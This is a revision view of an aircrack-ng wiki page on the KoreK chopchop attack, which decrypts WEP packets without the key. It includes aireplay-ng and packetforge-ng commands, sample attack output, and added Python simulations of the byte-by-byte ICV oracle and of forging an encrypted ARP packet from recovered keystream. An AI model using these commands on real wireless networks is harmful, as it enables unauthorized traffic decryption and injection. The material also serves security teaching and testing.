korek_chopchop: revision of 2006/11/19 16:12 by jeroenimo, compared with revision of 2009/06/02 19:24 by mister_x (Fixed packetforge command, thanks wims)

====== KoreK chopchop ======

===== Description =====
This attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work against dynamic WEP. //This attack does not recover the WEP key itself; it reveals the plaintext of the chosen packet and, as a by-product, the keystream (PRGA) for that packet's IV.// It works by chopping one byte off the end of the encrypted packet and letting the access point's ICV check tell it which of the 256 possible values the removed byte had; every answer shortens the packet by one more byte. However, some access points are not vulnerable to this attack. Some may seem vulnerable at first but actually drop data packets shorter than 60 bytes, which stops the attack before the packet is fully decrypted. If the access point drops packets shorter than 42 bytes, aireplay-ng tries to guess the remaining bytes, as far as the headers are predictable. If an IP packet is captured, it additionally checks that the IP header checksum is correct after guessing the missing parts of the header. This attack requires at least one WEP data packet.
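To make the mechanism concrete, here is a simulation of the chopchop core written for this page. It is an added example, not code from aircrack-ng or from the page's authors. It models the access point as an ICV oracle that accepts a frame only when its CRC32 ICV verifies and silently drops frames shorter than a threshold, recovers plaintext and keystream from the end of a constructed WEP frame one byte per round, and, once the oracle goes quiet, fills in the leading bytes from a predictable LLC/SNAP header the way the workaround described above does. The key, IV, ARP payload and the MIN_FRAME threshold are assumptions made for the demo; the real attack additionally needs the 802.11 framing, IV handling and MAC-address tricks that aireplay-ng provides.

```python
"""Simulated KoreK chopchop against one WEP-style frame body.

Added example, not code from the aircrack-ng page or project. Only the
cryptographic core is modelled: RC4 keystream, CRC32 ICV, and an access point
acting as an ICV oracle that accepts a frame only if its ICV verifies and
silently drops bodies shorter than MIN_FRAME. 802.11 headers, the IV field and
the MAC-address tricks are left out; KEY, IV and the ARP payload are constructed.
"""
import struct
import zlib

MIN_FRAME = 8  # assumption: the simulated AP drops bodies shorter than this

def rc4_keystream(key: bytes, n: int) -> bytes:
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def icv(data: bytes) -> bytes:
    """WEP ICV: CRC32 of the data, little-endian, appended before encryption."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

class AccessPoint:
    """The oracle the attack needs: does this body decrypt to data || icv(data)?"""
    def __init__(self, key: bytes):
        self.key = key

    def accepts(self, iv: bytes, body: bytes) -> bool:
        if len(body) < MIN_FRAME:  # too short: dropped, no reaction at all
            return False
        plain = xor(body, rc4_keystream(iv + self.key, len(body)))
        return plain[-4:] == icv(plain[:-4])

def _crc_table():  # reflected CRC32 table, polynomial 0xEDB88320 (as in zlib)
    tbl = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        tbl.append(c)
    return tbl

_T = _crc_table()
_INV_TOP = {t >> 24: j for j, t in enumerate(_T)}  # top byte -> table index
assert len(_INV_TOP) == 256  # the 256 top bytes are distinct; chopchop relies on this

def correction(x: int) -> bytes:
    """XOR mask for the last 4 bytes of the chopped frame if the removed byte was x.
    With R the CRC register before the last data byte m and j = (R ^ m) & 0xFF, the
    old ICV is ~(T[j] ^ (R >> 8)), so its top byte fixes j; the new ICV ~R differs
    from the tail [m, icv0, icv1, icv2] by exactly [j ^ 0xFF, T[j]_0, T[j]_1, T[j]_2]."""
    j = _INV_TOP[x ^ 0xFF]
    return bytes([j ^ 0xFF, _T[j] & 0xFF, (_T[j] >> 8) & 0xFF, (_T[j] >> 16) & 0xFF])

def chopchop(ap: AccessPoint, iv: bytes, body: bytes, known_prefix: bytes = b"") -> dict:
    """Recover plaintext and keystream of body from the end, one byte per round.
    When the AP starts dropping the shortened frames, the leading bytes are taken
    from known_prefix instead (the header re-creation workaround)."""
    n = len(body)
    plain, ks, cur = bytearray(n), bytearray(n), bytearray(body)
    offset, queries = n, 0  # bytes at index >= offset are recovered
    while len(cur) > 4:
        last, hit = cur[-1], None  # last: the ciphertext byte being chopped off
        for x in range(256):
            trial = bytearray(cur[:-1])
            for k, d in enumerate(correction(x)):
                trial[-4 + k] ^= d
            queries += 1
            if ap.accepts(iv, bytes(trial)):
                hit = (x, trial)
                break
        if hit is None:  # all 256 guesses vanished: the AP drops frames this short
            break
        x, cur = hit
        offset -= 1
        ks[offset] = last ^ x  # x is the plaintext byte of cur, not of body
        plain[offset] = body[offset] ^ ks[offset]
    known = min(offset, len(known_prefix))
    for i in range(known):  # predictable header bytes give keystream directly
        plain[i], ks[i] = known_prefix[i], body[i] ^ known_prefix[i]
    return {"plaintext": bytes(plain), "keystream": bytes(ks),
            "from_oracle": n - offset, "unknown": offset - known, "queries": queries}

# Constructed demo input: LLC/SNAP + ARP request, 40-bit key, fixed 3-byte IV.
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")
DATA = LLC_SNAP_ARP + bytes.fromhex(
    "0001080006040001" "00095bebc52b" "c0a80164" "000000000000" "c0a80102")
KEY = bytes.fromhex("0102030405")
IV = bytes.fromhex("0a0b0c")

def demo() -> dict:
    plain = DATA + icv(DATA)
    body = xor(plain, rc4_keystream(IV + KEY, len(plain)))
    return chopchop(AccessPoint(KEY), IV, body, LLC_SNAP_ARP)
```

The `correction()` function is the whole trick: because the top byte of every CRC32 table entry is distinct, the guessed last byte alone determines the 4-byte mask that turns the shortened ciphertext into a frame with a valid ICV, so the access point's reaction confirms or refutes each guess. Trying the 256 values in order costs on average 128 oracle queries per byte, which is why the sample output below reports anything from a dozen to a few hundred frames per offset. In the demo the oracle recovers 32 of the 40 bytes and the 8-byte LLC/SNAP prefix supplies the rest of the keystream.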

If you wish to learn more about the theory behind this attack, see [[ChopchopTheory]].


===== Usage =====

   aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0

Where:
  * -4 means the chopchop attack
  * -h 00:09:5B:EC:EE:F2 is the MAC address of an associated client, or your card's MAC if you did a fake authentication
  * -b 00:14:6C:7E:40:80 is the access point MAC address
  * ath0 is the wireless interface name

Although it is not shown, you may use any of the other [[aireplay-ng]] filters.  The main page of [[aireplay-ng]] has the complete list.  Additional typical filters are -m and -n, which set the minimum and maximum size of the packets to select.

If the "-h" option is omitted, an unauthenticated chopchop attack is performed.  See the example below for more details.


===== Usage Examples =====



==== Example with sample output ====

This is an example of an authenticated chopchop attack.  Meaning you must first perform a fake authentication and use that source MAC with the "-h" option.  Essentially this causes all packets to be sent with the source MAC specified by "-h", while the destination MAC varies over 256 combinations, one per guess, so that the frame the access point relays identifies which guess produced a valid ICV.

   aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0

Where:
  * -4 means the chopchop attack
  * -h 00:09:5B:EC:EE:F2 is the MAC address of our card and must match the MAC used in the fake authentication
  * -b 00:14:6C:7E:40:80 is the access point MAC address
  * ath0 is the wireless interface name

The system responds:

        Read 165 packets...
   
           Size: 86, FromDS: 1, ToDS: 0 (WEP)
   
           BSSID  =  00:14:6C:7E:40:80
           Dest. MAC  =  FF:FF:FF:FF:FF:FF
           Source MAC  =  00:40:F4:77:E5:C9
   
           0x0000:  0842 0000 ffff ffff ffff 0014 6c7e 4080  .B..........l~@.
           0x0010:  0040 f477 e5c9 603a d600 0000 5fed a222  .@.w..`:...._.."
           0x0020:  e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543  ...H......._=..C
           0x0030:  d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873  ....j.....%.[.(s
           0x0040:  16d4 43fb aebb 3ea1 7101 729e 65ca 6905  ..C...>.q.r.e.i.
           0x0050:  cfeb 4a72 be46                           ..Jr.F
   
   Use this packet ? y

You respond "y" above and the system continues.

   Saving chosen packet in replay_src-0201-191639.cap
   
   Offset   85 ( 0% done) | xor = D3 | pt = 95 |  253 frames written in   760ms
   Offset   84 ( 1% done) | xor = EB | pt = 55 |  166 frames written in   498ms
   Offset   83 ( 3% done) | xor = 47 | pt = 35 |  215 frames written in   645ms
   Offset   82 ( 5% done) | xor = 07 | pt = 4D |  161 frames written in   483ms
   Offset   81 ( 7% done) | xor = EB | pt = 00 |   12 frames written in    36ms
   Offset   80 ( 9% done) | xor = CF | pt = 00 |  152 frames written in   456ms
   Offset   79 (11% done) | xor = 05 | pt = 00 |   29 frames written in    87ms
   Offset   78 (13% done) | xor = 69 | pt = 00 |  151 frames written in   454ms
   Offset   77 (15% done) | xor = CA | pt = 00 |   24 frames written in    71ms
   Offset   76 (17% done) | xor = 65 | pt = 00 |  129 frames written in   387ms
   Offset   75 (19% done) | xor = 9E | pt = 00 |   36 frames written in   108ms
   Offset   74 (21% done) | xor = 72 | pt = 00 |   39 frames written in   117ms
   Offset   73 (23% done) | xor = 01 | pt = 00 |  146 frames written in   438ms
   Offset   72 (25% done) | xor = 71 | pt = 00 |   83 frames written in   249ms
   Offset   71 (26% done) | xor = A1 | pt = 00 |   43 frames written in   129ms
   Offset   70 (28% done) | xor = 3E | pt = 00 |   98 frames written in   294ms
   Offset   69 (30% done) | xor = BB | pt = 00 |  129 frames written in   387ms
   Offset   68 (32% done) | xor = AE | pt = 00 |  248 frames written in   744ms
   Offset   67 (34% done) | xor = FB | pt = 00 |  105 frames written in   315ms
   Offset   66 (36% done) | xor = 43 | pt = 00 |  101 frames written in   303ms
   Offset   65 (38% done) | xor = D4 | pt = 00 |  158 frames written in   474ms
   Offset   64 (40% done) | xor = 16 | pt = 00 |  197 frames written in   591ms
   Offset   63 (42% done) | xor = 7F | pt = 0C |   72 frames written in   217ms
   Offset   62 (44% done) | xor = 1F | pt = 37 |  166 frames written in   497ms
   Offset   61 (46% done) | xor = 5C | pt = A8 |  119 frames written in   357ms
   Offset   60 (48% done) | xor = 9B | pt = C0 |  229 frames written in   687ms
   Offset   59 (50% done) | xor = 91 | pt = 00 |  113 frames written in   339ms
   Offset   58 (51% done) | xor = 25 | pt = 00 |  184 frames written in   552ms
   Offset   57 (53% done) | xor = 94 | pt = 00 |   33 frames written in    99ms
   Offset   56 (55% done) | xor = F3 | pt = 00 |  193 frames written in   579ms
   Offset   55 (57% done) | xor = D6 | pt = 00 |   17 frames written in    51ms
   Offset   54 (59% done) | xor = FA | pt = 00 |   81 frames written in   243ms
   Offset   53 (61% done) | xor = EA | pt = 01 |   95 frames written in   285ms
   Offset   52 (63% done) | xor = 5D | pt = 37 |   24 frames written in    72ms
   Offset   51 (65% done) | xor = 33 | pt = A8 |   20 frames written in    59ms
   Offset   50 (67% done) | xor = CC | pt = C0 |   97 frames written in   291ms
   Offset   49 (69% done) | xor = 03 | pt = C9 |  188 frames written in   566ms
   Offset   48 (71% done) | xor = 34 | pt = E5 |   48 frames written in   142ms
   Offset   47 (73% done) | xor = 34 | pt = 77 |   64 frames written in   192ms
   Offset   46 (75% done) | xor = 51 | pt = F4 |  253 frames written in   759ms
   Offset   45 (76% done) | xor = 98 | pt = 40 |  109 frames written in   327ms
   Offset   44 (78% done) | xor = 3D | pt = 00 |  242 frames written in   726ms
   Offset   43 (80% done) | xor = 5E | pt = 01 |  194 frames written in   583ms
   Offset   42 (82% done) | xor = AF | pt = 00 |   99 frames written in   296ms
   Offset   41 (84% done) | xor = C4 | pt = 04 |  164 frames written in   492ms
   Offset   40 (86% done) | xor = CE | pt = 06 |   69 frames written in   207ms
   Offset   39 (88% done) | xor = 9D | pt = 00 |  137 frames written in   411ms
   Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms
   Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms
   Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms
   Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms
   Sent 957 packets, current guess: B9...
   
   The AP appears to drop packets shorter than 35 bytes.
   Enabling standard workaround: ARP header re-creation.
   
   Saving plaintext in replay_dec-0201-191706.cap
   Saving keystream in replay_dec-0201-191706.xor
   
   Completed in 21s (2.29 bytes/s)

Success!  The keystream file "replay_dec-0201-191706.xor" above can then be used in the next step to generate a packet with [[packetforge-ng]], such as an ARP packet.  You may also use tcpdump or Wireshark to view the decrypted packet, which is stored in replay_dec-0201-191706.cap.


==== Chopchop Without Authentication ====

This is an example of a chopchop attack without authentication.  Meaning you do not need to perform a fake authentication first, and you omit the "-h" option.  Essentially this causes all packets to be sent with 256 random source MAC addresses, one per guess, and a broadcast destination MAC.

This only works with a very limited number of access points (APs).  An AP that is vulnerable answers a frame from an unassociated source MAC with a deauthentication packet only if the frame was valid, that is, only if its ICV checked out.  When that happens, the source MAC the deauthentication is addressed to tells aireplay-ng which guess was right, and one byte has been successfully determined.

   aireplay-ng -4 -b 00:14:6C:7E:40:80 ath0

Where:
  * -4 means the chopchop attack
  * -b 00:14:6C:7E:40:80 is the access point MAC address
  * ath0 is the wireless interface name


==== Generating an ARP packet ====

1. First, we decrypt one packet

(Steps 2 and 3 are unchanged between the two revisions and are not shown in this comparison.)

The source IP (192.168.1.100) doesn't matter, but the destination IP (192.168.1.2) must respond to ARP requests. The source MAC must belong to an associated station, in case the access point is filtering unauthenticated traffic.

      packetforge-ng --arp -a 00:14:6C:7E:40:80 -h 00:09:5B:EB:C5:2B -k 192.168.1.2 -l 192.168.1.100 -y replay_dec-0627-022301.xor -w arp.cap

4. And replay our forged ARP request

      aireplay-ng -2 -r arp.cap ath0
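The forging step above, reduced to its cryptographic core as an added example (not packetforge-ng's own code): with the keystream recovered by chopchop for one IV, any plaintext no longer than that keystream can be turned into a correctly encrypted WEP body without the key, because the body is just (data || CRC32(data)) XOR RC4(IV || key). The keystream and addresses in the block are constructed for the demo; a real run reads the keystream from the replay_dec-*.xor file and must reuse that file's IV in the forged frame.

```python
"""Forging a WEP frame body from a recovered keystream (the packetforge-ng step).

Added example, not packetforge-ng's own code. With the keystream (PRGA) for one
IV, any plaintext no longer than that keystream can be encrypted without the key,
since a WEP body is (data || CRC32(data)) XOR RC4(IV || key). The keystream and
addresses below are constructed; a real run takes the keystream from the
replay_dec-*.xor file and must reuse that file's IV.
"""
import struct
import zlib


def icv(data: bytes) -> bytes:
    """WEP ICV: CRC32 of the data, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def build_arp_request(sender_mac: bytes, sender_ip: bytes, target_ip: bytes) -> bytes:
    """LLC/SNAP header + ARP request, the payload of an 802.11 data frame."""
    llc_snap = bytes.fromhex("aaaa030000000806")
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1)  # Ethernet, IPv4, opcode request
           + sender_mac + sender_ip + b"\x00" * 6 + target_ip)
    return llc_snap + arp


def forge(keystream: bytes, data: bytes) -> bytes:
    """Encrypt data || ICV with a known keystream. Refuses a keystream that is too
    short: the 'PRGA longer than the packet' point from the usage tips below."""
    plain = data + icv(data)
    if len(keystream) < len(plain):
        raise ValueError(f"need {len(plain)} keystream bytes, have {len(keystream)}")
    return bytes(p ^ k for p, k in zip(plain, keystream))


def decrypt_and_check(keystream: bytes, body: bytes) -> tuple:
    """What the access point does on receipt: strip the keystream, verify the ICV."""
    plain = bytes(c ^ k for c, k in zip(body, keystream))
    return plain[-4:] == icv(plain[:-4]), plain[:-4]


SENDER_MAC = bytes.fromhex("00095bebc52b")  # constructed; same MAC as the page's command
KEYSTREAM = bytes((i * 37 + 11) & 0xFF for i in range(48))  # constructed stand-in for a .xor file


def demo() -> tuple:
    data = build_arp_request(SENDER_MAC, bytes([192, 168, 1, 100]), bytes([192, 168, 1, 2]))
    return decrypt_and_check(KEYSTREAM, forge(KEYSTREAM, data))
```

The length check in `forge()` is the practical constraint to remember: chopchop yields exactly as many keystream bytes as the packet it decrypted, so the ARP request (36 bytes of payload plus a 4-byte ICV) has to fit inside that, which is why the usage tips below suggest rejecting a candidate packet that is shorter than what you intend to forge.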
  


===== Usage Tips =====

When to say no to a packet?  You may ask if there are times when you should say "no" to selecting a specific packet.  Here are some examples of when you might say no:

  * The packet was too short and you wanted/needed PRGA longer than the packet length.  The keystream you recover is only as long as the packet you decrypt, so a packet you forge from it cannot be longer than that.
  * You were looking to decrypt a packet to/from a specific client, so you would wait for a packet to/from that client's MAC address.
  * You may want to purposely pick a short packet.  The reason being that the decryption time is linear in the length of the packet, i.e. small packets take less time.




===== Usage Troubleshooting =====

Also see the general aireplay-ng troubleshooting ideas: [[aireplay-ng#usage_troubleshooting|aireplay-ng usage troubleshooting]]

Although not a direct troubleshooting tip for the chopchop attack, if you are unable to get the attack to work, there are some alternate attacks you should consider:

  * [[fragmentation|Fragmentation Attack]]: This is an alternate technique to obtain PRGA for building packets for subsequent injection.
  * [[interactive_packet_replay#other_examples|-p 0841 method]]: This technique allows you to reinject any data packet received from the access point and generate IVs.

korek_chopchop.txt · Last modified: 2009/06/02 19:24 by mister_x